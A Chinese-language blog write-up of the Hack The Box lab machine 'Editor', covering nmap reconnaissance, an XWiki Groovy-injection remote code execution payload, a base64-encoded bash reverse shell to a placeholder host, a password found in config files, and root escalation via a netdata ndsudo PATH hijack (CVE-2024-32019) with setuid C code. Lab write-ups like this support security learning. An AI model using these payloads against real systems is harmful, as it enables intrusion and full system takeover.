312 字
2 分钟
HTB-Editor WriteUp
2025-08-23
统计加载中...

1. Recon#

nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v 10.10.11.80
...
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open http
8080/tcp open http-proxy

访问http://10.10.11.80:8080时 ,页面提示Did not follow redirect to http://editor.htb/ ,因此需要将该域名添加至/etc/hosts中进行解析。

echo "10.10.11.80 editor.htb wiki.editor.htb" > /etc/hosts

再次访问,可见其基于XWIKI Debian 15.10.8框架搭建。

htb-editor-xwiki.png

2. Foothold#

搜索发现其存在一个远程代码执行的漏洞,尝试手动构造poc payload:

http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println('cat /etc/passwd'.execute().text){{/groovy}}{{/async}}

htb-editor-xwiki-poc.png

构造反弹shell payload

  1. 先将反弹命令以 base64 的形式编码
echo -n 'bash -i >& /dev/tcp/{YOUR_IP}/{YOUR_PORT} 0>&1' | base64
  1. 再将其嵌入至xwiki payload中
http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{async async=false}}{{groovy}}
["/bin/bash","-c","echo {YOUR_BASE64_STR} | base64 -d | bash"].execute()
{{/groovy}}{{/async}}
  1. 监听端口执行payload

htb-editor-rev_shell.png

反弹成功,看一下家目录,xwiki是个服务账户没有家目录,提权点应该在应用目录下。

htb-editor-home.png

在翻找xwiki配置文件的过程中找到口令。

htb-editor-oliver-pwd.png

3. PrivEsc#

在枚举 suid 文件的过程中发现 netdata 目录下有 suid 权限的脚本。

htb-editor-suid.png

  1. 编写提权脚本
#include <unistd.h> // for setuid, setgid, execl
#include <stddef.h> // for NULL
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", NULL);
return 0;
}
  1. 编译
x86_64-linux-gnu-gcc -o nvme CVE-2024-32019.c -static
  1. 添加执行权限
chmod +x nvme
  1. 添加至PATH环境中并执行
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

htb-editor-priv.png


4. Reference#

分享

如果这篇文章对你有帮助,欢迎分享给更多人!

HTB-Editor WriteUp
https://blog.41an.com/posts/htb-editor/
作者
Alan
发布于
2025-08-23
许可协议
CC BY-NC-SA 4.0

部分信息可能已经过时